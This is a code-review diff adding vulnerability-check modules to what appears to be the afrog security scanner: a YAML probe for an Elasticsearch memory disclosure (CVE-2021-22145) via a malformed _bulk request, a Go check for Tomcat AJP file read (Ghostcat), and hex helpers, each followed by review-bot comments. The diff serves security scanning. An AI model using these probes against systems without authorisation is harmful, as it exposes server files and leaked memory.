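--- /dev/null
+++ b/afrog-pocs/CVE/2021/CVE-2021-22145.yaml
@@ -0,0 +1,26 @@
+id: CVE-2021-22145
+
+info:
+name: ElasticSearch 7.13.3 - Memory disclosure
+author: dhiyaneshDk
+severity: medium
+description: |
+A memory disclosure vulnerability was identified in Elasticsearch 7.10.0 to 7.13.3 error reporting. A user with the ability to submit arbitrary queries to Elasticsearch could submit a malformed query that would result in an error message returned containing previously used portions of a data buffer. This buffer could contain sensitive information such as Elasticsearch documents or authentication details.
+ElasticSearch && port="9200"
+reference:
+- https://github.com/jaeles-project/jaeles-signatures/blob/e9595197c80521d64e31b846808095dd07c407e9/cves/elasctic-memory-leak-cve-2021-22145.yaml
+- https://nvd.nist.gov/vuln/detail/CVE-2021-22145
+- https://packetstormsecurity.com/files/163648/ElasticSearch-7.13.3-Memory-Disclosure.html
+- https://discuss.elastic.co/t/elasticsearch-7-13-4-security-update/279177
+
+rules:
+r0:
+request:
+method: POST
+path: /_bulk
+headers:
+Content-Type: application/json
+body: |
+@
+expression: response.status >= 400 && response.content_type.contains("application/json") && response.body.bcontains(b'"root_cause":') && response.body.bcontains(b'"reason":')
+expression: r0()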
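Review bot: The match expression on line 25 keys on the generic error shape (status >= 400, JSON content type, `"root_cause"` and `"reason"` present), which a patched Elasticsearch most likely also returns for a malformed `_bulk` body, so the rule would report fixed versions as vulnerable as well. Tightening the check toward the leaked-buffer symptom the description refers to, or pairing it with the version the server exposes, would reduce the false positives; at minimum a comment in the rule stating that the match is indicative rather than confirming would help whoever triages the results. Line 9 `ElasticSearch && port="9200"` has no key in the rendered view — if it is meant as a fingerprint filter it needs one, and if it is the tail of the `description` block scalar it reads oddly; confirm against the source file, since indentation is lost on this page.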
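--- /dev/null
+++ b/pkg/gopoc/tomcat.go
@@ -0,0 +1,58 @@
+package gopoc
+
+import (
+"bytes"
+"errors"
+
+"github.com/zan8in/afrog/pkg/poc"
+"github.com/zan8in/afrog/pkg/proto"
+"github.com/zan8in/afrog/pkg/utils"
+)
+
+var (
+tomcatAjpPort = "8009"
+tomcatAjpUnAuthName = "CVE-2020-1928"
+)
+
+func tomcatAjpUnAuth(args *GoPocArgs) (Result, error) {
+poc := poc.Poc{
+Id: tomcatAjpUnAuthName,
+Info: poc.Info{
+Name: "Apache Tomcat AJP 文件读取与包含漏洞",
+Author: "zan8in",
+Severity: "high",
+Description: "Tomcat AJP协议由于存在实现缺陷导致相关参数可控,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若服务器端同时存在文件上传功能,攻击者可进一步实现远程代码的执行。",
+Reference: []string{
+"https://blog.csdn.net/qq_44159028/article/details/112507136",
+},
+},
+}
+args.SetPocInfo(poc)
+result := Result{Gpa: args, IsVul: false}
+
+if len(args.Host) == 0 {
+return result, errors.New("no host")
+}
+
+addr := args.Host + ":" + tomcatAjpPort
+payload := []byte("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")
+
+resp, err := utils.Tcp(addr, utils.HexDecode(string(payload)))
+if err != nil {
+return result, err
+}
+
+if bytes.Contains(resp, []byte("Licensed to the Apache Software Foundation")) {
+result.IsVul = true
+url := proto.UrlType{Host: addr, Port: tomcatAjpPort}
+result.SetAllPocResult(true, &url, utils.HexDecode(string(payload)), resp)
+return result, nil
+}
+
+return result, errors.New("check result: no vul")
+}
+
+func init() {
+GoPocRegister(tomcatAjpUnAuthName, tomcatAjpUnAuth)
+}
+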
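Review bot: The identifier `CVE-2020-1928` on line 14 does not appear to match the Tomcat AJP file read/inclusion issue, which is tracked as CVE-2020-1938 (Ghostcat); because `tomcatAjpUnAuthName` is both the report id and the registry key used in `init()`, a wrong value ends up in every finding, so confirm it against the advisory. `addr := args.Host + ":" + tomcatAjpPort` on line 37 breaks for IPv6 literals and for hosts that already carry a port; `addr := net.JoinHostPort(args.Host, tomcatAjpPort)` (with `net` imported) handles the first, and `proto.UrlType{Host: addr, Port: tomcatAjpPort}` on line 47 then stores host:port in `Host` next to a separate `Port` field, which looks unintended — probably `Host: args.Host`. The hex payload is decoded twice (lines 40 and 48); decoding once into a local, e.g. `raw := utils.HexDecode(string(payload))`, avoids the repeated `[]byte` → `string` round trip and makes a failed decode visible in one place. `poc := poc.Poc{...}` on line 18 shadows the imported `poc` package for the rest of the function; naming the local `p` keeps the package usable.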
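--- a/pkg/utils/utils.go
+++ b/pkg/utils/utils.go
@@ -1,7 +1,9 @@
 package utils
 
 import (
+"encoding/hex"
 "io/ioutil"
+"log"
 "net/http"
 "net/url"
 "os"
@@ -173,3 +175,21 @@
 return num
 }
 
+//16进制解码
+func HexDecode(s string) []byte {
+dst := make([]byte, hex.DecodedLen(len(s))) //申请一个切片, 指明大小. 必须使用hex.DecodedLen
+n, err := hex.Decode(dst, []byte(s)) //进制转换, src->dst
+if err != nil {
+log.Fatal(err)
+return nil
+}
+return dst[:n] //返回0:n的数据.
+}
+
+//字符串转为16进制
+func HexEncode(s string) []byte {
+dst := make([]byte, hex.EncodedLen(len(s))) //申请一个切片, 指明大小. 必须使用hex.EncodedLen
+n := hex.Encode(dst, []byte(s)) //字节流转化成16进制
+return dst[:n]
+}
+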
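Review bot: `log.Fatal(err)` in HexDecode (line 183) terminates the whole scanner process on a single malformed hex string, and the `return nil` after it is unreachable, so a utility helper is making an exit decision that belongs to the caller. Returning the error is the cleaner fix, but it changes the signature for the new caller in pkg/gopoc/tomcat.go; the minimal change is `log.Printf("hex decode: %v", err)` followed by `return nil`, with a doc comment stating that nil means the input was not valid hex. Both functions can also drop the manual buffer sizing: `hex.DecodeString(s)` returns the decoded bytes and the error in one call, and `hex.EncodedLen`/`hex.Encode` never fail, so the `n` bookkeeping in HexEncode is unnecessary. The Chinese comments would serve `go doc` better as English doc comments that start with the function name, e.g. `// HexDecode decodes a hex string; it returns nil when the input is not valid hex.`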